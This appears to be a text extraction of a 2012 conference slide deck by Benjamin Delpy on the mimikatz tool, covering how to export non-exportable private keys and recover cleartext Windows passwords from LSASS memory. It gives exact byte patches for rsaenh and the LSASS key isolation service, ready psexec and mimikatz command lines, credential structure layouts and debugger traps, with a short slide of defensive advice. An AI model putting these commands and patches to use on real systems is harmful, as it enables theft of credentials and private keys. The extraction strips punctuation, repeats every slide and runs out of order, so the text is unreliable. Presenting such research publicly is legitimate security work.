ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40 40
mimikatz crypto capi how itrsquos exported ( level)
mimikatz crypto capi how itrsquos exported ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42 42
mimikatz cryptoexportCertificates Emplacement CERT_SYSTEM_STORE_CURRENT_USERMy - Benjamin Delpy Container Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03 Provider Microsoft Enhanced Cryptographic Provider v10 Type AT_KEYEXCHANGE Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO (0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================ Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0 Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BE Objet CN=Benjamin Delpy C=FR Il ne sagit pas dun certificat racine Hach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03 Fournisseur = Microsoft Enhanced Cryptographic Provider v10 La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de cryptage CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi demo time
mimikatz crypto patchcapi demo time
Import export import as not exportablehellip export
Import export import as not exportablehellip export
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44 44
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz sekurlsa wdigest workflow
mimikatz sekurlsa wdigest workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 20 20
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
typedef struct _KIWI_WDIGEST_LIST_ENTRY struct _KIWI_WDIGEST_LIST_ENTRY Flink struct _KIWI_WDIGEST_LIST_ENTRY Blink DWORD UsageCount struct _KIWI_WDIGEST_LIST_ENTRY This LUID LocallyUniqueIdentifier [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password [hellip]
KIWI_WDIGEST_LIST_ENTRY PKIWI_WDIGEST_LIST_ENTRY
wdigestl_LogSessList
search linked list for LUID
KIWI_WDIGEST_LKIWI_WDIGEST_LIST_ENTRY
password in clear
mimikatz sekurlsa wdigest demo time
mimikatz sekurlsa wdigest demo time
sekurlsawdigest
sekurlsawdigest
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 21 21
mimikatz sekurlsa livessp mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
because Microsoft was too good in closed networks
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 22 22
mimikatz sekurlsa livessp how
mimikatz sekurlsa livessp how
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23 23
0 kdgt process 0 0 lsassexe PROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4 DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not Accessiblegt Image lsassexe 0 kdgt process i 83569040 You need to continue execution (press g ltentergt) for the context to be switched When the debugger breaks in again you will be in the new process context 0 kdgt g Break instruction exception - code 80000003 (first chance) ntRtlpBreakWithStatusInstruction 814b39d0 cc int 3 0 kdgt reload user Loading User Symbols 0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g 0 kdgt g
mimikatz sekurlsa livessp how
mimikatz sekurlsa livessp how
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24 24
lsasrvLsaProtectMemory livesspLiveMakeSupplementalCred livesspLiveMakeSecPkgCredentials livesspLsaApLogonUserEx2 livesspSpiLogonUserEx2 lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2 livesspLsaApLogonUserEx2 (74781536) [] livesspLsaApLogonUserEx2+0x560 (74781a96) call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livessp workflow
mimikatz sekurlsa livessp workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flink struct _KIWI_LIVESSP_LIST_ENTRY Blink PVOID unk0 PVOID unk1 PVOID unk2 PVOID unk3 DWORD unk4 DWORD unk5 PVOID unk6 LUID LocallyUniqueIdentifier LSA_UNICODE_STRING UserName PVOID unk7 PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LISKIWI_LIVESSP_LIST_ENTRY KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSupp DWORD unk0 LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26 26
Me yes
mimikatz sekurlsa kerberos mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27 27
lsasrvLsaProtectMemory kerberosKerbHideKey kerberosKerbCreatePrimaryCredentials kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory kerberosKerbHidePassword kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory wdigestSpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6) workflow
mimikatz sekurlsa kerberos (nt6) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL DWORD unk0 PVOID unk1 PVOID unk2 PVOID unk3 ifdef _M_X64 BYTE unk4[32] elif defined _M_IX86 BYTE unk4[20] endif LUID LocallyUniqueIdentifier ifdef _M_X64 BYTE unk5[44] elif defined _M_IX86 BYTE unk5[36] endif LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5) workflow
mimikatz sekurlsa kerberos (nt5) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flink struct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCount PVOID unk0 PVOID unk1 PVOID unk2 DWORD unk3 DWORD unk4 PVOID unk5 PVOID unk6 PVOID unk7 LUID LocallyUniqueIdentifier
ifdef _M_IX86 DWORD unk8
endif DWORD unk9 DWORD unk10 PVOID unk11 DWORD unk12 DWORD unk13 PVOID unk14 PVOID unk15 PVOID unk16 [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa demo time
mimikatz sekurlsa demo time
Final sekurlsa demo sekurlsalogonPasswords full
Final sekurlsa demo sekurlsalogonPasswords full
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30 30
mimikatz sekurlsa kerberos ldquohu rdquo
mimikatz sekurlsa kerberos ldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31 31
mimikatz sekurlsa mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32 32
LsaUnprotectMemory
mimikatz sekurlsa LsaEncryptMemory NT5
mimikatz sekurlsa LsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKey BYTE[144]
